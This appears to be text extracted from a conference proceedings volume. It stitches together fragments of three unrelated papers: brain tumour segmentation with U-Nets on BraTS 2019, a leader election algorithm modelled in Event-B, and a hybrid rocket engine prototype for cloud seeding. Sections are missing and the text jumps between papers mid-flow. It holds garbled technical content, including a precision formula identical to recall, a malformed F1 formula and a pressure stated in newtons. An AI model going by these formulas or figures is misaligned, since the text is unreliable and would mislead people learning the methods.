D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_37
462 D. Verma and M. S. Pandey
2 Literature Review
MRI images studies of brain tumor is a critical step with manual image segmentation.
The manual image segmentation takes much time for segmenting the tumor, which
normally being slice-by-slice procedures, and the results are dependent on operators
knowledge. It is difficult to achieve the same result again through the same operator.
Moreover, HGG performing irregular boundaries that may also involve discon-
tinuation due to aggressive tumor intrusion. It may cause problems and may result in
poor tumor division [10]. Remove all problems of manual segmentation by automatic
segmentation of tumor.
Training data are required for supervised learning methods to learn a classifica-
tion model from new instances can be categorized and segmented. Both appearance
and context-based features were classified with 83% accuracy using an extremely
Computerized Assisted Segmentation … 463
residual blocks. Neural networks are universal feature approximators, and the perfor-
mance of networks improves as the number of layers increases. However, there is
a limit on how many layers can be applied to increase accuracy. Sufficiently deep
networks may be unable to learn simple functions such as the identity function due
to issues such as vanishing gradients and the curse of dimensionality. Therefore, it
does not help adding more layers to the neural network and training them. Training
of a few layers can be skipped by adding skip connections / residual connections.
Skip connections were referred to from [3].
Skip Connection
Skip connections are shortcuts that convolutional neural networks employ to jump
over some layers to skip training of those layers.
Multi Res U Net
The classical U-Net lacks in certain aspects such as when shape and size of the
images vary and can produce poor results. To overcome this, MultiResUNet was
introduced. In MultiResUNet, Inception-like (from Google Inception-V3) blocks
were introduced which replaced some of the convolutional layers. This reconciled
the U-Net to learn features from images at different scale. The 5 × 5 and 7 × 7 convo-
lutional layers were factorized using 3 × 3 convolutional blocks. Then a residual
connection was added due to its efficacy in biomedical segmentation. MultiResUNet
was referred to from [4].
Synthetic Segmentation in 3D MRI Scans
To increase the contrast within subregions of brain tissue using a generative adver-
sarial network (GAN). It does this by generating synthetic images from FLAIR MRI
scan. This synthetic image along with FLAIR, T1ce and T2 scans are then input to a
3D fully connected network (FCN) to segment tumor regions. This was referred to
from [5].
Dense-Vnet
MRI scans and brain masks were trained in the convolutional neural network and
Dense-Vnet. Dense-Vnet is made up of three layers of dense feature stacks with
concatenated outputs (Fig. 3).
3 Methodology
Here discuss the proposed approach and method which use in processing of image.
Image Segmentation
The image can be divided or partitioned into different sections, called segments.
It’s not a good idea to process the whole image at once because there would be areas
where no details are present. By splitting the image into segments, you can use the
important segments for image processing.
A set of pixels that are all different in an image. Image segmentation is a technique
for grouping pixels with similar characteristics.
Dataset
BraTS 2019 uses multi-institutional before operative MRI scans and focuses on
brain tumor segmentation, including gliomas, that works on intrinsically mixed (in
appearance, structure and histology). In addition, BraTS’19 also emphases on esti-
mating overall patient survival by unifying studies of radiomic features and machine
learning algorithms to identify the therapeutic significance of this segmentation
mission. It consists of 220 occurrences of HGG (high-grade glioma) cases and 54
instances of LGG (low-grade glioma) cases.
Network Architecture
A 9-layer U-Net was used to segment full tumor from the MRI scan. This was
done by giving Flair and T2 MRI scans as input to the 9-layer U-Net. The output was
the segmented image of the overall tumor. Middle point of this segmentation was
calculated and the image was cropped to segment core and ET part of tumor. The
cropped full tumor segmentation was given as input to a 7-layer U-Net. The output
will be core and ET part of tumor if sufficient pixels were present in the region
(Fig. 4).
Algorithm
1. Initially, one U-net model was used to segment full tumor, tumor core and
enhancing tumor (ET). It was found that full tumor got segmented but core
and ET were not properly segmented or not segmented at all. The problem was
because the core and ET of the tumor were too small compared to the whole
tumor, because core and ET consisted of less pixels than the whole tumor.
Therefore, model sometimes predicted that there is no tumor.
2. To solve the problem, firstly, full tumor was predicted by feeding the Flair and
T2 MRI scan images into a 9-layer U-Net. Full tumor prediction was cropped
to extract core and ET parts from T1ce MRI scan by calculating middle point
of full tumor prediction which consisted of most of the pixels.
3. The cropped parts were fed into another 7-layer U-Net which was used to predict
the core and ET of tumor. In post processing, coloring algorithm was applied
and core and ET predictions were pasted back to full tumor prediction after
applying different colors to core and ET.
4. Learning rate for training process of both the U-Nets was taken to be 1e-4 and
original image was 240 × 240 and extracted core and ET were 64 × 64.
466 D. Verma and M. S. Pandey
5. Models were trained for 100 to 300 epochs until convergence occurred. Dice
Loss was used.
6. Dice Loss = 1-dice_coefficient.
7. Dice coefficient = (2*(true*pred) + smooth)/((true)
+(pred) + smooth)
Where smooth = factor used to smooth out boundary predictions so boundary is not crisp.
8. 9-layer U-Net architecture (4th and 6th blocks removed to form 7-layer U-Net)
(Fig. 5).
Flow Graph of proposed Model
BraTS dataset is used for the competition multimodal brain tumor segmentation
and detection each year. A test accuracy of around 90% is achieved.
We consider the result in terms of Recall, Precision and F1 Score (Figs. 6, 7, 8).
TP
Precision =
TP + FN
precision × recall
F1 × Score = 2
precision × recall
TP
Recall = × 100
TP + FN
Challenges
Computerized Assisted Segmentation … 467
• There can be many challenges that the app may face such as low-resolution MRI,
less amount of data in case of training on new data (transfer learning).
• Usually, resolution and tissue contrast of the acquired data going into segmentation
algorithms are too low for most algorithms to accurately identify many small
subregions.
• The boundaries of tumor may not be well defined in the MRI scan sometimes
which may lead to wrong segmentation.
468 D. Verma and M. S. Pandey
Original Data: -
flair t1ce t1 t2
Predictions: -
Fig. 6 Result
4 Conclusion
This paper involves approach for detection of brain tumor and segmentation using the
U-Net CNN on both HGG and LGG cases, and it proves to be more efficient than the
previous unsupervised and supervised methods using normal machine learning tech-
niques. Data augmentation decreased the training time to a large extent which enabled
the training to be complete in 2–3 days. Test accuracy of about 90% was achieved.
This paper could be modified and used in the future to obtain the MRI image of brain
with tumor to find the size of tumor and to measure its tumor type and also the stage
of tumor. To achieve this 3D U-Net is used in place of conventional U-Net. MultiRes
U-Net can be used in the future instead of classical U-Net to get better results. In
this, certain convolutional layer of the U-Net are replaced with convolutional blocks
of the Google Inception-V3 convolutional neural network. Then, skip connections
used in residual network are used which will allow us to reuse the features from
previous layers plus the features obtained after convolution. Generative adversarial
network (GAN) be used to generate synthetic images of increased contrast which can
be used for segmentation to obtain better results. Dense-V net can be used to harness
the benefits of both Dense Net and U/V-Net. Dense Net contains skip connections
which can used to obtain both original features and features obtained after layers
for training. U/V-Net follows an encode–decode path. Combining both will produce
better result. A smaller CNN can be experimented and found with trial and error
which may give as good a result as Dense Net or U- Net.
References
1. Wang, J., Perez, L. (2017). The effectiveness of data augmentation in image classification us
ing deep learning, Stanford University.
2. Ronneberger, O., & Fischer, P. Thomas Brox: U-Net: convolutional networks for bio- medical
image segmentation, MICCAI.
3. He, K., Xiangyu Zhang, Shaoqing Ren, Jian Sun: Deep Residual Learning for Image
Recognition, Microsoft Research (2015)
4. Ibtehaz, N., Sohel Rahman, M. (2019). MultiResUNet : rethinking the U-Net architecture for
multimodal biomedical image segmentation. Neural Networks Journal.
5. Hamghalam, M., Lei, B., & Wang, T. (2020). Brain Tumor Synthetic Segmentation in 3D
Multimodal MRI Scans.
6. Ranjbar, S., Singleton, K. W., Curtin, L., Rickertsen, C. R., Paulson, L. E., Hu1, L. S., Mitchell,
J. R., & Swanson, K. R. (2020). Robust automatic whole brain extraction on magnetic resonance
imaging of brain tumor patients using dense-Vnet.
7. Liu, Z., Chen, L., Tong, L., Zhou, F., Jiang, Z., Zhang, Q., Shan, C., Zhang, X., Li, L., & Zhou,
H. (2020). Deep learning based brain tumor segmenta tion: a survey.
8. Sun, Y., Wang, C. (2020). A computation-efficient CNN system for high-quality brain tumor
segmentation.
9. Liu, D., Zhang, H., Zhao, M., Yu, X., Yao, S., & Zhou, W. (2018). Brain tumor segmention
based on dilated convolution refine networks. In 2018, IEEE 16th International Conference on
Software Engineering Research, Management and Applications (SERA).
10. Dong, H., Yang, G., Liu, F., & Mo’s, Y. (2017) Yike Guo’s: automatic brain tumor detection
and segmentation using U-Net based fully convolutional networks.
470 D. Verma and M. S. Pandey
11. Adhikary, S., Pimpalkar, A., & Kendhe, A. (2016). Detection of brain tumor from MRI images
by using segmentation and SVM. IEEE.
12. Sankari, D., Vigneshwari, S. (2017). automatic tumor segmentation using convolutionalneural
networks. In 2017 Third International Conference on Science Technology Engineering &
Management (ICONSTEM).
13. Borase, Z. V., Naik, G., & Londhe, V. (2018) Brain MR image segmentation for tumor detection
using artificial neural network. International Journal of Engineering and Computer Science
(IJECS).
Leader Election Algorithm in Fault
Tolerant Distributed System
1 Introduction
© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 471
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_38
472 S. Verma et al.
centralized server running that service. In case of any fault, we must have a fault tol-
erant system which can keep the service available. A fault-tolerant system executes
the algorithms to control and make distributed system available for certain services
in the presence of failures. More a system can tolerate failure, higher is the resilience
to failures and more dependable the system becomes [1].
Fault tolerance in the system can be provided by replication. State machine repli-
cation is a famous approach for implementing fault-tolerant system [2]. In such
system, same data is replicated on different processors. These replicated processors
are referred as replicas, and algorithms are executed to coordinate client’s interaction
with these replicas. Replication of data objects improves system’s availability, but
keeping these replicas identical is a complex process. It is believed that designating
a single node as coordinator in a distributed system makes it easy to achieve the
coherency among replicas. The coordinator is also referred as leader or primary site
in the system. Leader election is highly efficient in improving the performance and
reducing the overhead of coordination among other servers. The consensus proto-
cols used in a fault tolerant distributed system implemented through replicated state
machine such as PAXOS [3], RAFT [4] have fundamentally worked on leader elec-
tion, where a leader is elected and the elected node instructs other nodes to achieve
consistency and coherency among replicas. Leader based consensus algorithms syn-
chronize replicated state machines to ensure that all replicas have the same view
of the system state. Electing leader in a distributed system is a difficult process
as coordination is required among processes to exchange information to reach an
agreement. Each process must agree on a specific node as the leader of a system.
Along with some classic algorithms for leader election like Bully and Ring algo-
rithm, several algorithms have been proposed for leader election [5–7]. We propose
a leader election algorithm in which timestamps and ordering of the messages are
taken into consideration. The paper is divided into five sections, Sect. 1 is introduc-
tion. In Sect. 2 we discuss the importance of message ordering, in Sect. 3 proposed
algorithm is presented. Later in Sect. 4, a formal model of the proposed algorithm is
given in event-B developed on RODIN platform and in Sect. 5 we state the conclusion
and future scope of the proposed algorithm.
2 Message Ordering
When on any logical link between two nodes, message is being delivered in any order
not often in, first in-first out manner, the execution is known as non-FIFO, whereas
in FIFO execution messages are delivered in first in first out manner. Execution of
non-FIFO and FIFO are shown in Fig. 1a, b, respectively.
In causally ordered execution, suppose we have two send events S and S that are
causally related (not ordered as per physical time), then their receive events R and R
at all common destinations must occur in the same order. Causal ordering is satisfied
when two events S and S are concurrent (not causally related). In Fig. 2a an execution
that follows causal order is shown. In Fig. 2b causal order is violated by execution as
s1 ≺ s2 and r2 ≺ r1 at P1 (common receiver). In Fig. 2c, execution satisfies causal
order as they are not causally related.
In order to follow causal order in Fig. 2b message m2 must be kept waiting at P1
since s1 ≺ s2 then m1 must be delivered before m2 at P1.
Fig. 5 Process execution of the proposed algorithm with total and causal ordered delivery of
messages
Fig. 6 Process execution of the proposed algorithm with total and causal ordered delivery of
messages
Elect Message: When the requested site (sender of request message) receives the
majority of responses, it broadcasts a leader-elect message to declare itself as the
leader.
Relinquish Message: When the elected leader completes the task, it broadcasts a
relinquish message to let other sites know that it has completed the task and they can
initiate the leader election process.
Execution of the proposed algorithm with causal ordering and total ordering is
shown in Figs. 5 and in 6. We have considered three processes P1, P2 and P3 running
on different sites in the system. Let P1 initiate the process by broadcasting a request
message m1, on receiving a request other sites will acknowledge the request and
send an accept message m2, event e21 and e31 are causally preceded by event e11.
If any other site, which already accepted a request message, wants to initiate the
election process, as in Fig. 5 P3 initiates the process by sending request message m3,
it is permissible and the request should be accepted by the other sites. As events e31
and e32 are causally related, accept message m2 must be delivered before request
message m3 at common destination, i.e., P1 according to causal ordering. In Fig. 5
event e14 showing delivery of m2 message (by dotted line) after delivery of m3
message is not acceptable. The request message m3 must wait until the previous
request is fully processed by the requesting site.
Leader Election Algorithm in Fault Tolerant … 477
The next part of execution is shown in Fig. 6. Whenever the requesting site receives
the majority of the votes (i.e., M/2+1 where M is the number of site) it will broadcast
a message m4 claiming itself as the leader of the system (event e16 in Fig. 6). P1
will act as the leader of the system until it sends a relinquish message m5 to all
the sites through event e17. The message m5 will notify to the other sites that the
previous leader has completed its task and currently there is no designated leader
in the system. Now the site will acknowledge the request messages from other sites
(i.e., message m2) and sends an accept message m6 (event e18 and e24). The events
e16,e17,e18, and e24 are causally related to each other.
If two process sends request message concurrently (at the same logical time), i.e.,
they are not causally related then ordering of the events are ensured by total order
broadcast. In Fig. 7, both send events of process P1 and P3 are concurrent and follow
total ordering at the time of delivery, hence event e13 ‘(shown by dotted line) is not
acceptable at process P1. In this scenario, P3 will be elected as a leader as discussed
in the algorithm since its request is received first by processes P1, P2, and P3 through
events e12, e21 and e32, respectively.
After a leader election process has been executed, each node should recognize
a particular node as the task leader. The nodes communicate among themselves in
order to decide which one of them will get into the leader state. Each node has equal
opportunity of electing itself as the leader. The leader election problem can be seen
as a problem for each node to decide whether it is a leader or not. Constraint of the
algorithm is that exactly one node must decide that it is the leader. In algorithm, the
liveness property states that each processor must be in one state either elected or not
elected as a leader, safety property state that in every execution exactly one node
becomes a leader and rest determines that they are not elected. Basic properties of
an algorithm are achieved in the proposed algorithm in the following manner:
Termination: The algorithm completes the execution in finite time and one node
is elected as a leader.
Uniqueness: Exactly one node claims itself as the leader of a system at a particular
time.
Agreement: All other nodes should know about the elected leader and agree on
the election outcome.
478 S. Verma et al.
4 Modeling Approach
Event-B [11, 12] is a formal technique that precisely describes the possible behavior
of the system mathematically in an unambiguous manner. The problem is described
in an abstract model, followed by refinement levels introducing more detailed spec-
ifications. It has two components Machine and Context; Machine is the dynamic
part of the model, while context is the static part of the model. Machine provides
the behavioral properties of the model. It contains the variables, invariants, theo-
rem, and events. The events have guards and actions and at each refinement level
these guards are strengthened. The variable must satisfy invariants and the invariants
should be maintained by the activation of events. RODIN [13] is an industrial level
B tool that provides an automated proof support. It generates the proof obligations
and discharges them. Event-B has been extensively used in formal verification of
behavioral properties of a distributed system. The Event B specifications of global
causal ordering for fault tolerant transactions and total order broadcast for distributed
transactions on RODIN platform has been presented in [14, 15] respectively. In [16],
a formal approach of modeling and verification of distributed transactions for repli-
cated databases has been presented. In designing of a distributed system, liveness
and safety are two important issues to deal with. With respect to safety, RODIN gen-
erates proof obligations. In order to ensure that models are live and make progress,
in [17] it has been proved that Event-B models are non-divergent and enabledness
preserving. Security-critical system are modeled using Event-B, in [18] incremental
development of Mondex electronic purse (used for financial transactions) system in
Event-B is presented.
(i) Abstract Level: In the abstract level machine, we model the basic abstract objec-
tive of the algorithm. In the proposed algorithm for leader election (LEOD), we
assume that there is a set of sites among which a leader has to be chosen. In the
context, we define a finite carrier set SITE. In machine, we declare a variable leader
that belongs to power set of SITE and elected randomly by the execution of the event
ElectLeader. The event will execute only if there is no prior leader in the system.
Leader Election Algorithm in Fault Tolerant … 479
MACHINE LeaderM
SEES LeaderC
VARIABLES s,leader
INVARIANTS : s ∈ SITE, leader ∈ P(SITE)
EVENTS INITIALIZATION THEN
leader := ∅,s : ∈ SITE
END
ElectLeader
WHEN leader=∅
THEN leader:={s}
END
END
(ii) First Refinement Level: In first refinement level, new variables and events will
be introduced. Following are the proposed events in the first refinement level:
(a) Request_Vote: Whenever any site wants to become leader in the system, it broad-
cast a timestamped request message by executing this event .
(b) Receive_RequestVote: The event marks the delivery of the request message at
other sites.
(c) Response_Request: Through this event, a site sends its response to the requesting
site.
(d) Response_Receive: This event signifies that the response of a particular site is
being delivered at requesting site.
(e) ElectLeader: This is an event of abstract level that is being refined in this refine-
ment level, when requesting site receives majority of responses, it declares itself
as the leader and broadcast a message notifying the same.
(f) Leader_Release: After the elected leader completes its task it broadcast a relin-
quish message through this event.
(g) Receive_LeaderRelease: Delivery of relinquish message at other sites is marked
by this event.
References
Abstract Water being a necessity in various forms is always on demand for creating
power, drinking, cultivation, and farming, etc. hence, being a crucial asset for
humanity. A lot of regions are still scarce in water and get an irregular supply. As the
population is increasing, the need for water will increase drastically for usage and
other necessary purposes. One of the major problems that arise due to scarcity of water
is in agriculture, where lack of water affects crop yields and survivability. To solve
these problems, we propose and implement a novel technique of rocket-based 360
degrees cloud seeding to enhance artificial rain using an autonomous-landing rocket
and various machine learning concepts covering reinforcement learning, supervised
and unsupervised learning. In this paper, we have tested and analyzed the first phase
of the proposed technique that provided certain results over the design and application
of the first phase.
1 Introduction
Water is the most important support system to sustain life on Earth. Various sources
of water like rivers, groundwater, and reservoirs, or other means are on verge of
getting depleted due to the ever-increasing demands of the rising population. To
meet these demands, many countries try making artificial rain to increase the prob-
ability of rain. Though there are multiple impacts of the rain enhancement method,
© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 481
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_39
482 S. Shukla et al.
at many times, it has proven to be a better option than less or no rain at all. Imple-
menting various innovations and inventions, several methods and technologies such
as planes, drones, ground generators, electricity, lasers, rockets are being used at
the place where rainwater is insufficient. Out of many rain enhancement techniques,
cloud seeding is one such method and can be defined as the process that helps in
accelerating rain making process in providing an additional nucleus around which
water droplets can accumulate and condensate. Cloud seeding helps in hail suppres-
sion which decreases the overall size of the hails which thus minimizes the damage
when they hit the ground, providing prevention of crop damages, temperature control,
pollution control, drought control, etc. [1, 2]. It helps in booming agricultural sectors,
covering every benefit mentioned earlier like prevention against crop damage, a
controlling temperature which helps in speeding up the germination process of the
plants, providing water as rain. The more water available the more trees/plants which
increase the cycle of exchange of gases becomes stable and results in good yield.
Other applications like preventing flooding/ponding damage in the crop as they
require oxygen for respiration [3]. Cloud seeding applications in agriculture sectors
are endless yet to be implemented completely.
Apart from traditional methods and applications of cloud seeding, it is still been in
research until today. One of the latest feasibility tests of cloud seeding was conducted
in the Yadkin river basin, North Carolina (US) [4] to increase hydropower energy from
project dams using air and ground-borne seeding in different climatic conditions to
increase hydropower (clean energy). Similarly, UAE recently applied cloud seeding
projects and has gone for the three-month-long process of cloud seeding in 2020
that is a total of 95 cloud seeding missions by the National Center of Meteorology
(NCM) as based on the previous missions’ results [5]. Not far behind, China also used
and is still using cloud seeding methods to combat water shortages that may result in
adding 60 billion cubic meters of additional rainfall [6]. As China suffered from water
shortage, they came up with a solution for the problem as cloud seeding. Their new
technology of charged particle (negative ion)-based cloud seeding technique does
not use conventional chemicals in cloud seeding but use ion-based cloud seeding
that is cleaned and more beneficial, environment friendly, and economical to operate
on a large scale. Yet it is research and to be carried out in the field [7].
Recent studies in cloud seeding have been done to check the process and
enhancement in different climate regions. Various countries like UAE, Thailand,
and Serbia are using more efficient enhancement agents like core/shell sodium chlo-
ride (NaCl)/Titanium dioxide (TiO2) nanostructure (CNST) over previous agents like
NaCl seeding. The result shows that CNST is a more efficient and powerful precipi-
tation enhancer depending on humidity level and areas [8]. In addition to this, most
recent research done by the University of Colorado at Boulder using Quantifying
snowfall [9] from orographic cloud seeding for increasing snowpack in mountains
is being tested which uses radar dish to quantify snowfall and experiments using
high-voltage generated corona discharge in the formation of rain and snow [10]. The
solution provided by cloud seeding seems to grab the attention of the world yet coun-
tries like India where cloud seeding projects are not implemented in full potential due
to its history in cloud seeding projects. Recent activities have come into consideration
Engine Prototype and Testing Measurements of Autonomous … 483
like Karnataka’s climate modification projects [11] which are of previous projects
and seem it will end soon. Weather modification has not been developed and well
implemented in India due to a lack of implementation, interest, and involvement of
government or private weather agencies in weather-related projects. Yet is a variable
option for future needs. All solutions seem to have some potential to provide a solu-
tion toward water problems for now, and in the future, yet it is to be considered that
playing with Mother Nature is not the best option. We need a controlled pattern and
plan to practice these techniques but under control.
Apart from many cloud seeding approaches, countries and companies or agencies are
using rockets using an innovative network of artificial intelligence-enabled strategic
micro-rocket launches and a distributed grid of climactic sensors and spreading tech-
nologies for cloud seeding. Like ACAP’s Striyproekts, the “LOZA” missile protec-
tion system is designed for active impact on clouds by spraying chemical reagents
and for other considerations [12] The Nashik rocket project in India launching 1000
rockets to induce artificial rains was used for cloud seeding using a similar tech-
nique [13]. The rockets are launched from the ground with a missile rocket launcher
vehicle to target clouds nearer to the ground. This makes it good to target nearer
clouds reducing the probability of area coverage when things are not in favor of the
technique. These missiles cover a trajectory path from the ground to the cloud for
seeding and finally fall to the ground. The system of other rocket methods is practical
for small projects which makes it the least appropriable option but has great potential.
Upgrading to the trajectory concept, the Novel 360° cloud seeding approach is a new
highly efficient pattern forming cloud seeding approach for maximum coverage per
seeding [14]. This reduces costs and increases the probability of rain formation and
efficiencyi . The rocket heads toward the center of the targeted cloud and hovers for
a while to calculate the necessary details. After having the complete assurance of
it surrounding and stability, it opens the umbrella mechanism (Fig. 2) and spreads
seeding agents by shooting four smaller rockets in all four directions (Fig. 3). After
which the rocket heads back to the ground for self-landing to be ready for targeting
other clouds. Meanwhile, if the previous cloud needs more seeding the rocket follows
the above-mentioned approach but changing its orientation different than the previous
four directions, this makes a circular seeding process to seed the clouds in one go
rather than conventional methods of stripes in a row (Fig. 1) [14].
Figure 1 shows the conventional methods done by planes, drones, etc. using
multiple stripes pattern technique in a single cloud for spreading seeding agents
into clouds. As per conventional or present-day technologies, this type of seeding is
considered the best option so far as it ensures more probability of rainfall than other
used methods.
484 S. Shukla et al.
Even though this is the best option so far, alternative methods are being developed
yet the procedure of plane-based cloud seeding reduces efficiency and increases the
time and cost rapidly.
Figure 2 shows the umbrella mechanism in action which acts as a launching
platform for smaller rockets for stable and directional liftoffs. During the hovering
period, the arms open at 90°each, and the thrust platform provides an action-reaction
platform to gain maximum speed for the smaller rockets to shoot into the clouds in a
Engine Prototype and Testing Measurements of Autonomous … 485
controlled direction. Four smaller rockets carrying seeding agents as fuel gets liftoff
into the clouds to complete the task of 360° cloud seeding.
Figure 3 shows the 360° pattern or orientation that spreads the seeding agents in all
four directions. As mentioned in Fig 2, the smaller rockets are launched into specific
directions for variable seeding. The direction in the above picture can be changed
to any four directions within 360°using thrust vectoring and reaction control system
(RCS) [12] for active real-time control to increase the effectiveness of seeding and
increasing the probability of rain.
The rocket base cloud seeding method (report paper) uses machine learning to make
the whole concept feasible in the real environment it uses:
• Reinforcement learning (RL) [16]: Reinforcement learning (Fig. 4) is part of
machine learning (ML) where the core idea is to try copying human real-time intel-
ligence of action and reaction (reflex) based on experience and real-time response
over any problem-solving activity involving environment (surroundings), inter-
preter (humans), agent (rocket), and action (reactions). This concept is used in our
Fig. 4 Reinforcement
learning
486 S. Shukla et al.
define the working of the rocket. It is the more over the software side that is used by
the navigation to communicate and decide the best course of action. The changes in
the direction are done via mechanical inputs via TVC and RCS giving small devi-
ations creating torque and steering the rocket to the right state vector controlled by
the algorithms. It is also responsible for mission abort if everything goes wrong.
The process starts with the liftoff of the rocket from the ground fully equipped
with all the necessary and predictable maneuvers planned. The on-board computer
starts taking all data and decisions. At a point in the middle of the flight trajectory,
cloud tracking systems start giving detailed data and suggestions about humidity level
and its positioning in 3D space to the ground control center to give a final decision
over the course of action. At the time when the targeted cloud has been entered,
the rocket gives a final signal before starting the seeding process and checking the
orientation of the rocket for a mechanism to get active by pressuring the hydraulics
pistons. Meanwhile, the on-board continuously stabilizes the rocket hovering using
TVC and RCS against the variables. Reinforcement learning controls every factor
possible from liftoff to landing. The rocket hovers for a while within this the umbrella
mechanism [12] opens its arms and ignites the seeder rockets using both TVC and
RCS to counterbalance the seeders thrust in all four directions. The rocket then
descent using radar to determine the descent speed and use the umbrella mechanism
arms as active air brakes to slow down the rocket and finally TVC and RCS slowly
land the rocket on the ground. The seeder rockets either get destroyed during the
seeding process or land on the ground using parachutes giving their active location
to the control stations to collect them. These all steps, maneuvers, and data sharing
works so fast that the total process takes take a few minutes to complete.
488 S. Shukla et al.
Materials Used: Polymethyl meta acrylate (PMMA) fuel grain, O2 tank for oxidizer,
switch valves, pipes, 8 × 8 × 8 inches aluminum Block for the nozzle and two 8 × 2
× 8 inches aluminum slab for the support engine cover, aluminum rings (12 inches),
pressure gauze, 0.5 − inch screws, rubber inner walls, and miscellaneous.
Figure 7 explains the fuel and oxidizer flow. The oxidizer gets released into the
fuel through an inlet 150psi ~ 10.6 N initiating a chemical reaction inside the combus-
tion chamber due to temperature raided by ignition, it starts burning due to excess
oxygen (O2 ). The combustions chamber increases the pressure due to the expansion
of particles and gases, and a huge amount of thrust is escaped from the rocket nozzle
propelling the rocket forward.
Figure 8 shows the engine layout including an inlet for oxidizer, a post-combustion
chamber for the increasing flow of the oxidizer, the fuel grain (PMMA), a post-
combustion chamber for the increasing region of combustion before exiting through
the nozzle. All parts combined show the engine part of the hybrid rocket system
[15]. This system is optimal as per real-time control over accidents ensuring safety,
efficiency, and reduction of internal and external damages of the rocket.
Figures 9 and 10 shows the engine prototypes side and top view with an inlet for
oxidizer, regulators, skeleton frame, fuel grain (PMMA), and nozzle.
Figure 11a describes the theoretical nozzle design made up of aluminum and used
CNC for accurate construction of the nozzle. It includes three parts, the combustion
chamber where the expansion of fuel takes place by mixing the oxidizer and the fuel
and igniting it, the throat part compresses the expanded gases to an extreme velocity
that eventually gets released through the end of the nozzle making the rocket to move
forward against the gravity.
Figure 11b is the actual nozzle design that includes contraction for making the
expanded gases gain extreme exit speed which further moves toward the throat for
the highest compression possible by decreasing the area of flow, and increasing exit
pressure, force, and expansion that gives maximum thrust and efficiency.
Figures 12 and 13 show the physical model of the nozzle applying design layout
in CNC. The nozzle has a mass of 1.5 kg as it is designed considering upcoming
phases. During the upcoming phases, the designs will be the most accurate design
using 3D design tools, simulation, and rendering.
490 S. Shukla et al.
4 Testing Results
In this section, we will present the testing results of the rocket-based cloud seeding
mechanism. As rocket testing was conducted in different phases, we will elaborate
in detail on each phase in this section.
Engine Prototype and Testing Measurements of Autonomous … 491
• Ignition phase: Fig. 14 showcases the burning of fuel with oxidizer and getting
ignited to reach the desired temperature for maximum thrust, burning out irreg-
ularities in design and fuel along with it. It shows contraction compression and
expansion taking place initially is one of the most crucial parts in thrust expansion
ensuring constant thrust, then robustness of the design and its practicality. This
phase is one the most important phase as this ensures the safety, adaptability, and
strength of the design to handle the force exerted by the internal expansion of
fuel and oxidizer. If this phase fails, then the design is considered fatal and re-
designing must be applied immediately. Our prototype was built for these kinds
of internal pressure which resulted in a successful ignition phase ensuring that the
prototype is safe and suitable for more pressure to move to the next phase.
• Leveling up thrust phase (rise in maximum temperature): As the ignition
phase was safely executed, the prototype was moving to the next phase to with-
stand an even greater amount of pressure as shown in Fig. 15, leveling up was
performed to reach the maximum temperature and pressure for full thrust. This
phase examines the design workings in terms of calculation (pressure/force),
ability to withstand the rise in temperature, structural integrity, application of
design, and its compositions. This phase checks the engine efficiency and tests
Fig. 15 Fuel in its maximum ignition temperature level for lamina flow
the engine to its maximum potential. At a certain pressure, the thrust becomes
constant for a certain time; thus, it reaches its maximum potential and decreases
as inlet pressure decreases becomes constant. At 150psi ~ 10.6 N, the thrust of the
prototype became constant and started decreasing a bit as our inlet of the oxidizer
to the engine was limited and the exit pressure was increasing immensely.
• Maximum thrust and pressure phase: Maximum pressure and temperature arc
along with over expanded thrust results in the maximum thrust provided by the
engine. Figure 16 shows ideal situation pa ∼ = pe, the maximum thrust of 49.03 N
= 5 kg and pressure, the first curve of diamond thrust. This phase is in connection
to the leveling up temperature phase as this phase just stayed for around 7–8 s
before the structural strength of the engine got weakened as the temperature arc
reached near the inlet area. This shows that our designs had some flaws (pre-
combustion protection cover got damaged due to temperature rise) in the area
near inlet pressure. The flaws are considered as unavailability of good insulators
for the protection that is the result of various external and miscellaneous factors.
After this result, the prototype was forced to shut down by cutting up the oxidizer
flow into the engine. Even though the result was not perfect but it showed the
advantage of having a hybrid engine that enables to have full control to abort the
testing if something is out of control.
Final phase: After 7 seconds of burn time, the pressure raised to temperature
started melting the body (aluminum) along with the seal near the oxidizer inlet as
shown in Fig.17. Even though the body got damaged during the temperature arc, the
nozzle had no damage or melt. The test was complete with the results that many things
had to be reconsidered like inlet pressure nozzle, material selection, weight reduction
sealing, and the design. Few things did not go according to the plan which is fine as
things are unpredictable in rocket science. After a few debugging in design, the same
engine will be practical for larger scaling for the prototype. The test was a success,
giving us the necessary details and data over various factors and to rethink the design
factor and safety. This also proved that the reusability of the rocket engine is possible
as, during the test, external factors were the only things that were unpredictable which
shows that after multiple iterations, the final result will help to reduce the overall cost
of transporting the umbrella mechanism and seeders to its final position in the clouds
and will be able to re-use the engine for the next launch. Small steps and iteration
till the final rocket engine will provide the most efficient transporter of the seeders.
The next testing will have the new improved reusable engine with way more thrust.
Figure 18 shows the ideal case of raise in altitude concerning the time of this
prototype if the thrust to weight ratio is TWR > 1 and efficiency is more. The rocket
looks like it rising exponentially. Apart from the ideal situation, the current stage was
not able to show such theoretical results. This means that the design of the prototype
was not up to the mark including factors like overweight and less thrust or TWR
< 1, as shown in the graph it is taking a lot of time to overcome its inertial mass
and gain upward momentum against the gravity (Fig. 19). The more time it takes
to gain momentum and cover maximum altitude the less fuel it has to continue the
trajectory. A selection of materials and engine efficiency increases the altitude will
be proportional to time.
Figure 19 Shows the graph between thrust and acceleration. The prototype was
able to give 49.03 N of thrust which was not sufficient to overcome the TWR; thus,
the acceleration was negative 7.8 m/s2 49.03 N, similarly, the negative acceleration
was overcome to positive at around 250 N of thrust, and to make the rocket move it
was needed to overcome the g 9.8 m/s2 for liftoff
Figure 20 shows the graph between propulsion efficiency and equivalent velocity.
The propulsion efficiency shows irregularity inefficiency because oxidizer pressure
through inlet150psi ~ 10.6 N was a constant and lesser as compared to what was
Fig. 20 Propulsion
efficiency (np ) versus
equivalent velocity m/s graph
of the rocket
5 Result Discussion
This overall experiment of the rocket phase 1 prototype gave the results close to the
calculations that were made in our previous work. The final phase was at its extreme
level and was in danger of explosion and burst-out of flames. The results we were
